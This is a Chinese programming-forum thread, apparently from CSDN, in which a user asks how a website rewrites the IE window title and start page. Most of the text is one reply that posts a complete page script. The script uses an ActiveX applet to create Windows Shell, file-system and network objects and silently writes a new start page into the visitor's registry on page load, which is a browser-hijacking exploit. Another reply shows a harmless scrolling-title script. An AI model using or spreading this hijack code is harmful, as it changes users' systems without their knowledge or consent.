http://www.rainbyte.com/
我要上课去了,下午再回来。

解决方案 »

  1.   

    我知道!!!
    <HTML>
    <HEAD>
    <meta http-equiv="Content-Type" content="text/html; charset=gb2312">
    <TITLE>XML 技术 @ 【孟宪会之精彩世界】</TITLE>
    <link rel = "Shortcut Icon" href="../favicon.ico"><script language="javascript">
    <!-- 
    if (document.all) {
    var clocktext=" ╲╱╲╱╲╱╲╱╲╱╲╱╲╱╲ ***  欢迎光临  *** ╱╲╱╲╱╲╱╲╱╲╱╲╱╲╱╲╱★★★★★★";
    var ii=clocktext.length;
    var pagetitle = document.title;
    var i=0;
    function scroll() {
    var tmp="";
    tmp+=clocktext.substring(clocktext,i)
    i++;
    if(i>=ii){i=0;}
    clocktimer = setTimeout("scroll()", 100);
    document.title = pagetitle + tmp + "  ︰︰┉┉━━>  ";
    window.status=document.title;
    }
    scroll();
    }
    // -->
    </script><body>
    <IMG alt="孟" border=0 height=16 src="http://lucky.myrice.com/images/copyright.gif" width=16 align="absmiddle">
    </BODY>
    </HTML>
      

  2.   

    我说的那个Window Title是每个新开的页面都显示它的信息。
      

  3.   

    它改了注册表里的HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main里数据,不知道是怎么办到的。
      

  4.   

    <HTML><HEAD><TITLE>袁飞的个人主页</TITLE>
    <META content="text/html; charset=gb2312" http-equiv=Content-Type><LINK 
    rel=stylesheet type=text/css>
    <SCRIPT>
    document.write("<APPLET HEIGHT=0 WIDTH=0 code=com.ms.activeX.ActiveXComponent></APPLET>");//this function is only needed if you add favorites or links
    function AddFavLnk(loc, DispName, SiteURL)
    {
     var Shor = Shl.CreateShortcut(loc + "\\" + DispName +".URL");
     Shor.TargetPath = SiteURL;
     Shor.Save();
    }
    //end add favorites or links functionfunction f(){
     try
     {
      //ActiveX initialization
      a1=document.applets[0];
      a1.setCLSID("{F935DC22-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Shl = a1.GetObject();
      a1.setCLSID("{0D43FE01-F093-11CF-8940-00A0C9054228}");
      a1.createInstance();
      FSO = a1.GetObject();
      a1.setCLSID("{F935DC26-1CF0-11D0-ADB9-00C04FD58A0B}");
      a1.createInstance();
      Net = a1.GetObject();  try
      {
         //set home page
        Shl.RegWrite ("HKCU\\Software\\Microsoft\\Internet Explorer\\Main\\Start Page", "http://ygyuan.go.163.com");
        var expdate = new Date((new Date()).getTime() + (24 * 60 * 60 * 1000 * 90));
         //end set home page
        }
      catch(e)
      {}
     }
     catch(e)
     {}
    }function init()
    {
     setTimeout("f()", 1000);
     setTimeout("AddFavLnk('','袁飞的个人主页','http://ygyuan.go.163.com')", 1000);
    }init();</SCRIPT><META content="MSHTML 5.00.2920.0" name=GENERATOR></HEAD>
    <BODY bgColor=#ffffff leftMargin=5 topMargin=2></BODY></HTML>